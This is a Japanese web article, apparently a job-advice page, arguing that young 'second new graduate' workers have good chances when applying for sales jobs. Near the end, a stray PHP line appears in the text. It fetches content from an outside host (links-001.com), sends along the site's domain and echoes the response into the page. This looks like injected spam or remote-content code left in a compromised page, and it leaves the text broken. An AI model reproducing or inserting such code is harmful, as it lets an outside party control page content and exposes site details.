前へ
次へ

第二新卒の転職と営業の求人に応募した時の採用率

第二新卒の方々は、よく転職活動を検討しています。大学を卒業した後に就職したものの、2年目や3年目あたりに色々な不満点が生じてくるケースは、比較的よくあります。不満の理由は色々ありますが、給料に関する悩みは多いです。現在の会社はあまり給料は高くないので、営業の求人に応募しようと検討している第二新卒も多いです。ただ第二新卒という状況ですと、求人に応募した後に採用されるかどうか不安になってしまう事もあります。上記のように入社2年目や3年目程度ですと、営業の求人に応募してみても、採用されないという不安が浮上してくる訳です。確かに職種によっては、キャリアが浅い人物は難しい事もあります。企業によっては、経験者限定で採用している事もあります。それだけに第二新卒という状況では、企業によっては採用されない事も実際あります。しかし営業という仕事の場合は、また話は異なります。求人広告を確認してみると、第二新卒でも問題ない会社であると判断できる事も多いです。そもそも第二新卒者は、営業の求人に応募した時の採用率は比較的高いです。キャリアがある人材よりも、むしろ第二新卒の方が内定率は高めになる傾向があります。その主な理由は、年齢です。そもそも第二新卒者は、まだ年齢が非常に若いです。キャリアがある人材よりも若いですし、会社としては育てやすい傾向があります。しっかり教育すれば、十分に現場で活躍してくれると見込まれるので、第二新卒者を積極採用している企業は多いです。また第二新卒者は、それなりに経験はあります。勤続年数が2年や3年ぐらいある訳ですから、少なくとも未経験ではありません。大学を卒業したばかりの人物ですと、まだ経験はありません。それだけに会社としても、社会人マナーを含めて1から教育する必要があります。企業からすると、かえって第二新卒者の方が助かる訳です。ですから第二新卒者が営業職で転職するのは、決して難しくありません。積極採用してくれる企業も沢山ありますし、まず営業の求人に応募してみると良いでしょう。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top